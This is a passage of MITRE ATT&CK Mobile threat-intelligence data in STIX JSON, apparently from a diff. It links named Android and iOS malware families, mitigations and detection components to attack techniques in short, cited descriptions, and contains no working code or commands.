"source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:52:46.975Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can modify the SELinux enforcement mode.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a81431c4-ac34-4b63-9647-eb7c8e529e03", + "created": "2020-12-24T21:45:56.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:14:46.472Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access call logs.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cf26d49c-1d1b-4861-9d6e-959f4f15b73a", + "type": "relationship", + "created": "2019-08-09T17:53:48.716Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.716Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can capture photos using the front and back cameras.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cd8c383a-2a62-45e5-917f-a26efe5ba03c", + "created": "2023-03-20T18:51:29.814Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:29.814Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--576dfa89-d400-4cac-b32d-8ee85a9de5d7", + "created": "2023-03-20T18:57:42.922Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:42.922Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c574251b-93ad-4f55-8b84-2700dfab4622", + "created": "2020-07-15T20:20:59.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:27.443Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can hide its icon on older Android versions.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--db1201f0-f925-4c3c-8673-7524a8c20886", + "type": "relationship", + "created": "2021-02-17T20:43:52.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.274Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has recorded calls.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--024f9ee4-cb7d-49f4-b180-ad1e5e168a4c", + "created": "2017-10-25T14:48:53.747Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 7 and later iOS versions introduced changes that prevent applications from performing Process Discovery without elevated privileges. ", + "modified": "2022-03-30T20:32:46.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3230c032-17e0-49f7-b948-c157049aafe2", + "created": "2017-10-25T14:48:53.742Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should ensure bootloaders are locked to prevent arbitrary operating system code from being flashed onto the device.", + "modified": "2022-04-01T15:34:50.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--18a6020d-8fea-4a6e-84ab-a18343f2acea", + "created": "2022-04-06T13:40:14.515Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 10 Privacy Changes", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 prevents applications from accessing clipboard data unless the application is on the foreground or is set as the device’s default input method editor (IME).(Citation: Android 10 Privacy Changes)", + "modified": "2022-04-06T13:40:14.515Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b477afcb-7449-4fae-b4aa-c512c22d7500", + "type": "relationship", + "created": "2020-09-15T15:18:12.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.394Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can send SMS messages.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--327d0102-2113-4e12-be68-504db097a6fd", + "created": "2019-08-07T15:57:13.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:01:31.230Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) communicates with the command and control server using HTTP requests.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8", + "created": "2022-04-01T15:16:02.324Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "iOS Universal Links", + "url": "https://developer.apple.com/ios/universal-links/", + "description": "Apple. (n.d.). Universal Links for Developers. Retrieved September 11, 2020." + }, + { + "source_name": "Android App Links", + "url": "https://developer.android.com/training/app-links/verify-site-associations", + "description": "Google. (n.d.). Verify Android App Links. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Developers should use Android App Links(Citation: Android App Links) and iOS Universal Links(Citation: iOS Universal Links) to provide a secure binding between URIs and applications, preventing malicious applications from intercepting redirections. Additionally, for OAuth use cases, PKCE(Citation: IETF-PKCE) should be used to prevent use of stolen authorization codes. ", + "modified": "2022-04-01T15:16:02.324Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8ff45341-60d6-40d3-bb38-566814a466f9", + "created": "2020-07-20T13:27:33.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:51:31.121Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can perform primitive emulation checks.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b67f04d9-1cbd-49b4-9ec3-a33a41ac42ab", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[OBAD](https://attack.mitre.org/software/S0286) contains encrypted code along with an obfuscated decryption routine to make it difficult to analyze.(Citation: TrendMicro-Obad)", + "relationship_type": "uses", + "source_ref": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--40c9adb5-9d1a-4f51-8ef2-a80c2d78e4e4", + "created": "2022-04-05T19:38:41.538Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "If devices are enrolled using Apple User Enrollment or using a profile owner enrollment mode for Android, device controls prevent the enterprise from accessing the device’s physical location. This is typically used for a Bring Your Own Device (BYOD) deployment. ", + "modified": "2022-04-05T19:38:41.538Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5e95ca90-bf75-4031-a28f-f8565c02185c", + "created": "2020-11-24T17:55:12.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:23:49.569Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can lock the user out of the device by showing a persistent overlay.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d44b097a-1bba-40bd-8ec8-d717a3f3df0c", + "created": "2023-03-03T16:24:30.564Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:24:30.564Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has hijacked normal application’s launch routines to display ads.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--373223d8-f18c-4151-8fe0-7d40c0c6e631", + "type": "relationship", + "created": "2020-11-24T17:55:12.885Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.885Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has used timers to enable Wi-Fi, ping the C2 server, register the device with the C2, and register wake locks on the system.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cb80178a-5f9c-41bd-95a2-a7c5fe23c12c", + "created": "2022-04-01T18:48:03.156Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:48:03.156Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--079911c5-0db9-4eb2-ab85-6ed6e118fbbc", + "created": "2022-03-30T19:36:20.304Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be trained on what device administrator permission request prompts look like, and how to avoid granting permissions on phishing popups.", + "modified": "2022-03-30T19:36:20.304Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--22290cce-856a-46d5-9589-699f5dfc1429", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "modified": "2020-07-20T13:49:03.687Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) covertly records phone calls.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--27490b14-8044-408a-8c6a-6d8427eb78ff", + "created": "2023-03-20T18:44:26.233Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:26.233Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2836dc3d-cbea-493b-af31-5f1fa8279ec2", + "created": "2020-04-24T17:46:31.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:00:28.299Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) communicates with the C2 by sending JSON objects over unencrypted HTTP requests.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e3d04885-95a5-47cb-a038-b58542cf787d", + "created": "2019-09-03T19:45:48.487Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:08:39.524Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can exfiltrate the call log.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3c3c957e-7a23-4801-9f6a-ba599ad727d7", + "type": "relationship", + "created": "2019-10-15T19:33:42.204Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "modified": "2019-10-15T19:33:42.204Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can track the device's location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--91de92af-fe1d-469e-8c36-1a9f4b621a27", + "type": "relationship", + "created": "2020-07-20T13:27:33.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.704Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489)’s code is obfuscated.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b7282bf9-63f8-49ad-8ee0-f2ad523a367e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[DualToy](https://attack.mitre.org/software/S0315) side loads malicious or risky apps to both Android and iOS devices via a USB connection.(Citation: PaloAlto-DualToy)", 